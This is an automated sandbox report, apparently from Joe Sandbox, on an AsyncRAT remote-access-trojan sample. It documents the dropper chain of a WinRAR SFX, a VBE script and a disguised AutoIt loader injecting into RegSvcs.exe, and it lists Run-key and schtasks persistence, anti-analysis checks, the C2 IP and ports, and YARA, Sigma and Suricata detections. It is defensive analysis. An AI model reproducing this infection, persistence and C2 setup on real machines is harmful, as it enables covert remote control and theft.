Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yjOJ1YK5M3.exe

Overview

General Information

Sample name:yjOJ1YK5M3.exe
renamed because original name is a hash value
Original sample name:7B17EBBF77F53472D2FEBB38E9785026.exe
Analysis ID:1582904
MD5:7b17ebbf77f53472d2febb38e9785026
SHA1:f3e6e40de8a8ca8b7cc3f8f4d636ad788df39935
SHA256:c23b7950208b8f8e8a22c401cb5e9a05e560ae6119307d975ba601b4e2e99273
Tags:AsyncRATexeRATuser-abuse_ch
Infos:

Detection

AsyncRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM autoit script
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected Autoit Injector
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Protects its processes via BreakOnTermination flag
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Double Extension Files
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • yjOJ1YK5M3.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\yjOJ1YK5M3.exe" MD5: 7B17EBBF77F53472D2FEBB38E9785026)
    • wscript.exe (PID: 7016 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 1852 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 1312 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
      • cmd.exe (PID: 3940 cmdline: "C:\Windows\System32\cmd.exe" /c cipkucw.ppt xdgrnj.pdf MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cipkucw.ppt (PID: 1420 cmdline: cipkucw.ppt xdgrnj.pdf MD5: 0ADB9B817F1DF7807576C2D7068DD931)
          • RegSvcs.exe (PID: 2800 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • cmd.exe (PID: 6496 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 7040 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • cipkucw.ppt.exe (PID: 3484 cmdline: "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 2368 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cipkucw.ppt.exe (PID: 3732 cmdline: "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 6668 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cipkucw.ppt.exe (PID: 5780 cmdline: "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 6852 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware Configuration

Threatname: AsyncRAT

{"Server": "195.26.255.81", "Port": "6606,7707,8808,0077,1996,2106,7777", "Version": "| Edit by Vinom Rat", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "false", "Group": "true"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Asyncrat_11a11ba1unknownunknown
    • 0xcfa8:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
    • 0x10258:$a2: Stub.exe
    • 0x102e8:$a2: Stub.exe
    • 0x9724:$a3: get_ActivatePong
    • 0xd1c0:$a4: vmware
    • 0xd038:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
    • 0xa747:$a6: get_SslClient
    00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
    • 0xd03a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
    0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Asyncrat_11a11ba1unknownunknown
      • 0xc190:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
      • 0xf040:$a2: Stub.exe
      • 0xf0d0:$a2: Stub.exe
      • 0x890c:$a3: get_ActivatePong
      • 0xc3a8:$a4: vmware
      • 0xc220:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
      • 0x992f:$a6: get_SslClient
      Click to see the 68 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      17.3.cipkucw.ppt.exe.d56820.0.raw.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        17.3.cipkucw.ppt.exe.d56820.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          17.3.cipkucw.ppt.exe.d56820.0.raw.unpackWindows_Trojan_Asyncrat_11a11ba1unknownunknown
          • 0xd188:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
          • 0x10038:$a2: Stub.exe
          • 0x100c8:$a2: Stub.exe
          • 0x9904:$a3: get_ActivatePong
          • 0xd3a0:$a4: vmware
          • 0xd218:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
          • 0xa927:$a6: get_SslClient
          17.3.cipkucw.ppt.exe.d56820.0.raw.unpackrat_win_asyncratDetect AsyncRAT based on specific stringsSekoia.io
          • 0x9904:$str01: get_ActivatePong
          • 0xa927:$str02: get_SslClient
          • 0xa943:$str03: get_TcpClient
          • 0x8df7:$str04: get_SendSync
          • 0x8ef1:$str05: get_IsConnected
          • 0x962d:$str06: set_UseShellExecute
          • 0xd4ae:$str07: Pastebin
          • 0xeb46:$str08: Select * from AntivirusProduct
          • 0x10038:$str09: Stub.exe
          • 0x100c8:$str09: Stub.exe
          • 0xd298:$str10: timeout 3 > NUL
          • 0xd188:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn
          • 0xd218:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
          17.3.cipkucw.ppt.exe.d56820.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
          • 0xd21a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
          Click to see the 40 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Invoke-Obfuscation CLIP+ Launcher
          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7016, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 1852, ProcessName: cmd.exe
          Sigma detected: Invoke-Obfuscation VAR+ Launcher
          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7016, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 1852, ProcessName: cmd.exe
          Sigma detected: New RUN Key Pointing to Suspicious Folder
          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, ProcessId: 3484, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
          Sigma detected: Script Interpreter Execution From Suspicious Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\yjOJ1YK5M3.exe", ParentImage: C:\Users\user\Desktop\yjOJ1YK5M3.exe, ParentProcessId: 6640, ParentProcessName: yjOJ1YK5M3.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , ProcessId: 7016, ProcessName: wscript.exe
          Sigma detected: Suspicious Double Extension Files
          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, ProcessId: 1420, TargetFilename: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt.exe
          Sigma detected: Suspicious Script Execution From Temp Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\yjOJ1YK5M3.exe", ParentImage: C:\Users\user\Desktop\yjOJ1YK5M3.exe, ParentProcessId: 6640, ParentProcessName: yjOJ1YK5M3.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , ProcessId: 7016, ProcessName: wscript.exe
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\yjOJ1YK5M3.exe", ParentImage: C:\Users\user\Desktop\yjOJ1YK5M3.exe, ParentProcessId: 6640, ParentProcessName: yjOJ1YK5M3.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , ProcessId: 7016, ProcessName: wscript.exe
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, ProcessId: 3484, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
          Sigma detected: Execution of Suspicious File Type Extension
          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: cipkucw.ppt xdgrnj.pdf, CommandLine: cipkucw.ppt xdgrnj.pdf, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, NewProcessName: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, OriginalFileName: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cipkucw.ppt xdgrnj.pdf, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3940, ParentProcessName: cmd.exe, ProcessCommandLine: cipkucw.ppt xdgrnj.pdf, ProcessId: 1420, ProcessName: cipkucw.ppt
          Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: cipkucw.ppt xdgrnj.pdf, ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, ParentProcessId: 1420, ParentProcessName: cipkucw.ppt, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", ProcessId: 2800, ProcessName: RegSvcs.exe
          Sigma detected: Use NTFS Short Name in Command Line
          Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf, CommandLine: "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf, ProcessId: 3484, ProcessName: cipkucw.ppt.exe
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\yjOJ1YK5M3.exe", ParentImage: C:\Users\user\Desktop\yjOJ1YK5M3.exe, ParentProcessId: 6640, ParentProcessName: yjOJ1YK5M3.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , ProcessId: 7016, ProcessName: wscript.exe
          Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, ProcessId: 1420, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-31T20:26:35.833177+010020355951Domain Observed Used for C2 Detected195.26.255.812106192.168.2.449737TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-31T20:26:35.833177+010020356071Domain Observed Used for C2 Detected195.26.255.812106192.168.2.449737TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-31T20:26:35.833177+010028424781Malware Command and Control Activity Detected195.26.255.812106192.168.2.449737TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "195.26.255.81", "Port": "6606,7707,8808,0077,1996,2106,7777", "Version": "| Edit by Vinom Rat", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "false", "Group": "true"}
          Multi AV Scanner detection for submitted file
          Source: yjOJ1YK5M3.exeReversingLabs: Detection: 62%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.7% probability
          Source: yjOJ1YK5M3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: yjOJ1YK5M3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: yjOJ1YK5M3.exe
          Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000C.00000000.1873063732.0000000000BD2000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe.6.dr
          Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000C.00000000.1873063732.0000000000BD2000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe.6.dr
          Source: Binary string: C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdB source: cipkucw.ppt.exe, 00000011.00000003.2089984383.0000000000B34000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0027F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0027F826
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00291630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00291630
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0075E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,6_2_0075E387
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0075D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0075D836
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0075DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0075DB69
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00769F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00769F9F
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0076A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0076A0FA
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0076A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_0076A488
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_007665F1 FindFirstFileW,FindNextFileW,FindClose,6_2_007665F1
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00767248 FindFirstFileW,FindClose,6_2_00767248
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_007672E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,6_2_007672E9
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0102E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,15_2_0102E387
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0102D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_0102D836
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0102DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_0102DB69
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_01039F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_01039F9F
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0103A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_0103A0FA
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_010365F1 FindFirstFileW,FindNextFileW,FindClose,15_2_010365F1
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0103A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_0103A488
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_01037248 FindFirstFileW,FindClose,15_2_01037248
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_010372E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,15_2_010372E9

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 195.26.255.81:2106 -> 192.168.2.4:49737
          Source: Network trafficSuricata IDS: 2030673 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 195.26.255.81:2106 -> 192.168.2.4:49737
          Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 195.26.255.81:2106 -> 192.168.2.4:49737
          Source: Network trafficSuricata IDS: 2035607 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 195.26.255.81:2106 -> 192.168.2.4:49737
          Yara detected Generic Downloader
          Source: Yara matchFile source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPE
